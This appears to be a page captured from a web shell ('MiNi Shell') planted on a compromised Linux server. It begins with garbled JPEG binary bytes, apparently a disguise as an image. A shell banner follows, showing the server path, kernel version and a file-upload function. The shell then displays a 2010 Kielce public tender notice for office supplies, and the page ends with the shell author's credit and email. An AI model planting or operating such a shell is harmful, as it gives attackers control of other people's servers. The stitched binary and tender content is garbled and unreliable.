JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20101123/333495-N-2010.html

<p class="kh_header"><b>Kielce: DOSTAWA MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 333495 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1).	Przedmiotem zamówienia jest zakup wraz z dostawą i rozładunkiem przez wykonawcę w siedzibie zamawiającego materiałów biurowych, tj. 
1.	Blok notatnikowy A-5, bez oprawy, w kratkę, 50 kartek, z perforacją  	Szt.	12;
2.	Blok notatnikowy A-4, bez oprawy, w kratkę, 50 kartek, z perforacją  	Szt.	12;
3.	Długopis żelowy  z wymiennym wkładem żelowym,. Kolor niebieski.	Szt.	8;
4.	Długopis żelowy  z wymiennym wkładem żelowym. Kolor czarny.	Szt.	8;
5.	Długopis żelowy  z wymiennym wkładem żelowym. Kolor czerwony.	Szt.	8;
6.	Długopis żelowy  z wymiennym wkładem żelowym. Kolor zielony.	Szt.	8;
7.	Dziurkacz biurowy metalowy 	Szt.	4;
8.	Etykieta samoprzylepna 105x48 mm przeznaczone do druk. atr. i laser., oraz ksero, posiadają certyfikat gwarantujący najwyższą jakość A4 /100.	Op.	10;
9.	Gumka do wycierania ołówka, biała winylowa 	Szt.	10;
10.	Kalkulator biurowy  - 12 pozycyjny, 	Szt.	4;
11.	Kalkulator biurowy - 12 pozycyjny, z wydrukiem na rolce papierowej, 	Szt.	1;
12.	Koperta C-6 /1000 biała samoklejąca z paskiem.	Op.	1;
13.	Koperta C-4/1000 biała samoklejąca z paskiem.	Op.	1;
14.	Koperta C-5 /1000 biała samoklejąca z paskiem.	Op.	5;
15.	Korektor w długopisie, 	Szt.	8;
16.	Korektor w taśmie pstrykowy, 	Szt.	8;
17.	Notesy samoprzylepne, gładkie, 100 karteczek w bloczku, wymiary 38x51mm.	Szt.	16;
18.	Notesy samoprzylepne, gładkie, 100 karteczek w bloczku, wymiary  76x76mm.	Szt.	40;
19.	Klej w sztyfcie,	Szt.	8;
20.	Koszulki na dokumenty, format A-4, groszkowa, , pakowane po 100 szt., 	Op.	10;
21.	Teczka na dokumenty z gumką.	Szt.	20;
22.	Klipy do papieru 12 szt. w op./25 mm.	Op.	5;
23.	Klipy do papieru 12 szt. w op./32mm.	Op.	5;
24.	Klipy do papieru 12 szt. w op./41mm.	Op.	5;
25.	Klipy do papieru 12 szt. w op./51mm.	Op.	5;
26.	Linijka 20cm, wykonana z przezroczystego polistyrenu.	Szt.	4;
27.	Linijka 50 cm, wykonana z przezroczystego polistyrenu.	Szt.	2;
28.	Marker do opisywania płyt CD/DVD -czarny, 	Szt.	4;
29.	Marker nieścieralny do szkła, papieru, drewna i plastiku, kolor czarny.	Szt.	8;
30.	Marker nieścieralny do szkła, papieru, drewna i plastiku, -  kolor czerwony.	Szt.	8;
31.	Marker nieścieralny do szkła, papieru, drewna i plastiku, -  kolor niebieski.	Szt.	8;
32.	Marker nieścieralny do szkła, papieru, drewna i plastiku -  kolor zielony.	Szt.	8;
33.	Nożyczki  biurowe	Szt.	5;
34.	Ołówek z gumką, super trwały grafit który nie łamie się, pakowany - 12 szt. w op.	Op.	1;
35.	Papier ksero A4 , 80g/m2 , 161 CIE ?2, wilg. 3,0-5,0 % , 500 arkuszy w ryzie.	Ryz	128;
36.	Papier 160 g A4/250 arkuszy w ryzie -  do kopiarek, drukarek atramentowych  i laserowych,  kolor kość słoniowa.	Ryz	1;
37.	Przekładki kolorowe PP - 10 kart A/4, pasują do każdego segregatora.	Op.	20;
38.	Przybornik biurowy  z małym jeżem przeźroczysty.	Szt.	4;
39.	Półka biurowa przeźroczysta A4, wykonana z polistyrenu.	Szt.	20;
40.	Pinezki srebrne, opakowanie 50szt.	Op.	2;
41.	Pinezki kolorowe do tablic, opakowanie 50 sztuk. 	Op.	2;
42.	Rozszywasz uniwersalny do zszywek 24/6 oraz 26/6.	Szt.	5;
43.	Segregator  format A-4, 75mm.	Szt.	20;
44.	Spinacz biurowy okrągły R28, w opakowaniu 100 szt.	Op.	10;
45.	Segregator  format A-4 , 50mm, 	Szt.	10;
46.	Teczka wiązana biała 250g/m2 A4/100.	Op.	3;
47.	Taśma klejąca, przezroczysta, wymiary : 24mmx30m. 	Szt.	10;
48.	Taśma pakowa, brązowa  do pakowania kartonów, wymiary : 48mmx50m.  	Szt.	5;
49.	Wkład do długopisów z poz. 3 kolor niebieski, szerokość lini pisania nie większa niż 0.32mm, długość lini 1000m. 	Szt.	16;
50.	Wkład do długopisów z poz. 4 kolor czarny, szerokość lini pisania nie większa niż 0.32mm, długość lini 1000m. 	Szt.	8;
51.	Wkład do długopisów z poz.5 kolor czerwony, szerokość lini pisania nie większa niż 0.32mm, długość lini 1000m. 	Szt.	8;
52.	Wkład do długopisów z poz.6 kolor zielony, szerokość lini pisania nie większa niż 0.32mm, długość lini 1000m. 	Szt.	8;
53.	Zestaw 4 cienkopisów .Fibrowa , niklowo- srebrna końcówka , kolory w zestawie: czarny ,czerwony, niebieski, zielony .	Op.	8;
54.	Zszywacz biurowy 	Szt.	4;
55.	Bindownica do grzbietów plastikowych,	Szt.	1;
56.	Tablica korkowa w drewnianej ramie. Wymiary 90x120 cm.	Szt.	3;
57.	Mapa administracyjna woj. Świętokrzyskiego na płycie miękkiej w ramie aluminiowej Alu 23, rama z profilu aluminiowego, kolor popielaty.	Szt.	1;
58.	Ofertówki A4, przeźroczyste z folii o grubości 90 mic, otwierane u góry i z prawej strony, w opakowaniu 100 szt. 	Op. 	2;
59.	Skoroszyt A4 miękki z folii PCV, przednia okładka przezroczysta tylna kolorowa w kolorze żółtym, w opakowaniu 20 szt.	Op.	8;
60.	Spinacze metalowe o długości 26 mm w pudełku magnetycznym, w opakowaniu 100 szt.	Op.	8;
61.	Grzbiety wsuwane A4 Standard, średnica 6 mm kolor niebieski, w opakowaniu 50 szt.	Op.	3;
62.	Grzbiety wsuwane A4 Standard, średnica 10 mm kolor niebieski, w opakowaniu 50 szt.	Op.	3;
63.	Grzbiety plastikowe do bindowania, średnica 19 mm, kolor niebieski, w opakowaniu 100 szt.	Op.	2;
64.	Grzbiety plastikowe do bindowania, średnica 16 mm, kolor niebieski, w opakowaniu 100 szt.	Op.	2;
65.	Okładki do bindowania  dwustronnie kolorowe, skóropodobne, 250g/m2, kolor niebieski, w op. 100 szt.	Op.	10;
66.	Papier kolorowy, format A4, 80g/m2 w kolorze zieleń trawy-pastelowy, w opakowaniu 500 szt.	Op.	2;
67.	Papier kolorowy, format A4, 80g/m2 w kolorze kremowym-pastelowy, w opakowaniu 500 szt.	Op.	2;
68.	Karton wizytowy A4 230g/m2- kremowy czerpany, w opakowaniu 20 szt.	Op.	8;
69.	Zszywki 24/6, galwanizowane, grubość zszywanego pliku do 20 kartek, w opakowaniu 1000 szt.	Op.	18;
70. 	Długopis czarny mat,	Szt.	4;
71.	Pióro kulkowe czarne,	Szt. 	4;
72.	Wkład do długopisu, kolor czarny z poz. 70,	Szt.	4;
73.	Wkład do długopisu, kolor niebieski z poz.70,	Szt.	4;
74.	Wkład do pióra kulkowego, kolor czarny z poz. 71,	Szt.	4;
75.	Wkład do pióra kulkowego, kolor niebieski z poz. 71,	Szt.	4;
76.	Akcesoria do tablic z poz. 56 - beczułki, w opakowniu 30 szt.	Op.	4;
77.	Akcesoria do tablic z poz.56 - flagi, w opakowaniu 30 szt. 	Op.	4;
78.	Spinacz owalny R50, w opakowaniu 100 szt.	Op.	10;
79.	Zestaw zakreslaczy w 4 kolorach: żółty, pomarańczowy, czerwony i zielony - 4 szt. w opakowaniu. 	Op.	4;
80.	Rolki papierowe do kalkulatora  z poz. 11, (7 szt. w zgrzewce),	Zg.	1;
2). Szczegółowy opis przedmiotu zamówienia zawiera Dodatek Nr 2 do SIWZ - Formularz cenowy, który stanowić będzie odpowiedni załącznik do oferty wykonawcy. Cena oferty ma obejmować wszystkie koszty, które poniesie wykonawca, łącznie z dostawą przedmiotu zamówienia i jego rozładunkiem w siedzibie zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielnie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednią wiedzą i
doświadczeniem. Zamawiający oceni spełnienie tego warunku wg zasady spełnia/nie spełnia, na
podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu , na podstawie art. 22
ust.1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim
potencjałem technicznym. Zamawiający oceni spełnienie w/w warunku udziału w postępowaniu
wg zasady spełnia/nie spełnia, na podstawie oświadczenia z art. 22 ust. 1 ustawy Prawo
zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielnie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do
wykonania zamówienia. Zamawiający oceni spełnienie tego warunku wg zasady spełnia/nie
spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu , na
podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielnie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni spełnienie
tego warunku wg zasady spełnia/nie spełnia, na podstawie oświadczenia o spełnianiu warunków
udziału w postępowaniu , na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ; 
2.	Wypełniony Formularz cenowy - wg wzoru określonego w dodatku nr 2 do SIWZ, który stanowić będzie odpowiedni załącznik do oferty wykonawcy.
3.	W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub  poświadczona notarialnie kopia). 
4.	Pełnomocnictwo określające jego zakres - w przypadku, gdy wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach, al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 344
(III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach al. IX Wieków
Kielc 3, 25-516 Kielce, Budynek C-2, pokój 146 (Kancelaria Ogólna, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - projekt Koordynacja na rzecz aktywnej integracji.

Wyżej wymieniony projekt funkcjonuje w Regionalnym Ośrodku Polityki Społecznej i Zdrowotnej Obserwatorium Integracji Społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com